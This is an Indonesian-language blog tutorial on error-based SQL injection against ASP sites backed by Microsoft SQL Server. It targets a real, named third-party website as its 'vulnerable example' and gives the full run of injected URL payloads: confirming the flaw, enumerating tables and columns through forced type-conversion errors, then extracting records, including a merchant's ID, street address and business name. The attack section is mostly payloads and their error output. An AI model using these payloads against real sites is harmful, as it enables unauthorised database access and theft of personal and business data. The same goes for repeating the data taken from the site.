Semoga bermanfaat, saia sengaja share di posting kali ini terutama biar saia engga' lupa. cz lagi belajar ASP karena LOL1ds juga masih newbie mode ON ini mah..h. ^_* .
dan semoga ini juga bermanfaat buat teman2 sekalian yg sudi mampir
di BLOG LOL1dsonline yg jelek ini :P LOL.

O.k. CEKEDOT....

Contoh Web Yang Vuln :

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12

CEK VULN / GAK !!!
==================

Cek Bisa di Inject apa gak dgn cara tambah kan tanda ' di akhir URL

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12'

Jika Error nya seperti ini :

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' AND t.TopicID = m.topicID '.
/main/ListPosts.asp, line 56

Microsoft OLE DB Provider (SQL Server Driver) <---- Inti nya ada di sini !!!
Selain SQL Server Driver (Provider) ndak tau deh gua :D

maka Lanjut ...CARI STRUKTUR TABEL !!!
=======================

1) Debugging

Debugging di sini untuk memunculkan pesan error dr MsSQL.

SQL Inject nya adalah "and 1="

2) Munculkan nama tabel

Query nya : and 1=convert(int,(select top 1 table_name from information_schema.tables))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables))--

Error yang muncul adalah :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Merchants' to a column of data type int.
/main/ListPosts.asp, line 56

bisa dilihat di situ kita dapat tabel dengan nama "Merchants".

berbeda dgn MySQL, MsSQL dalam output nya membedakan tipe data, sehingga kita perlu mengkonversi nya agar SQL dapat memunculkan pesan error yang kita inginkan.

skrg kita cari tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants')))--

Error yang muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'category' to a column of data type int.
/main/ListPosts.asp, line 56

Bisa di lihat Query nya berbeda dgn MySQL. MySQL ndak support "not in" sedangkan MsSQL support "not in" ^^

nah dapat tabel dgn nama "category" .... kita coba cari lagi tabel selanjut nya.

Query : and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('Merchants','category')))--

Error yng muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Codes' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tabel dgn nama "Codes". Silahkan cari lagi nama tabel yang di inginkan.

CARI STRUKTUR COLUMN !!!
========================

Contoh kita mau cari column yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants'))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantId' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column dgn nama "merchantId" ... yok cari lagi column laen :D

QUery : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid')))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'address' to a column of data type int.
/main/ListPosts.asp, line 56

dapat deh column "address". cari lage column ne ...

Query : and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='Merchants' and column_name not in ('merchantid','address')))--

Error yg muncul:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'merchantName' to a column of data type int.
/main/ListPosts.asp, line 56

dapat tuh column "merchantName" ekkekekeke ....

Silahkan kalo mo nyari lagi ^^

PENGAMBILAN DATA !!!
====================

Contoh kita mau lihat isi dari column "merchantid, address, merchantName" yg ada di tabel "Merchants".

Query : and 1=convert(int,(select top 1 merchantid from merchants))--

http://www.gamexus.com/main/ListPosts.asp?tid=11&cat=General+Discussion&catID=1&msgID=12 and 1=convert(int,(select top 1 merchantid from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc' to a column of data type int.
/main/ListPosts.asp, line 56

dapat "merchantid" = "alohacc".

nah gmn kalo mau ngambil isi column ne sekaligus ??

Query : and 1=convert(int,(select top 1 merchantid%2b':'%2baddress%2b':'%2bmerchantName from merchants))--

Error yg muncul :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'alohacc:154 West Coast Rd Ginza Plaza #B1-55 S(127371):aloha Cybercafe' to a column of data type int.
/main/ListPosts.asp, line 56

Note : %2b = + sedangkan ':' = pembatas


#o.k sekian CEKEDOT-nya dan terimakasih... Wassalamu'alaikum Wr.Wb.


./credit : http://www.blog-tey.com







Article information: Description: ASP MsSQL Injection Rating: 4.5 - Reviewer: LOLids artich - ItemReviewed: ASP MsSQL Injection


Related Tips, Tricks and Tutorials :



0 komentar Post :
ASP MsSQL Injection


NOTE:
Follow me ON Facebook , Twitter or

Blog ini adalah Blog DoFollow dengan PageRank Free PageRank Checker, sobat akan mendapatkan Backlink untuk BLOG anda dengan berkomentar di Blog ini. Jangan ada komentar Spam, Please!!.

"Jika Menemukan LINK yg Tidak bisa di akses pada BLOG ini!, silahkan beritahu kepada kami melalui Komentar, Form, etc . sesegera mungkin kami akan memperbaikinya. Terimakasih"




Post a Comment

Next Prev Home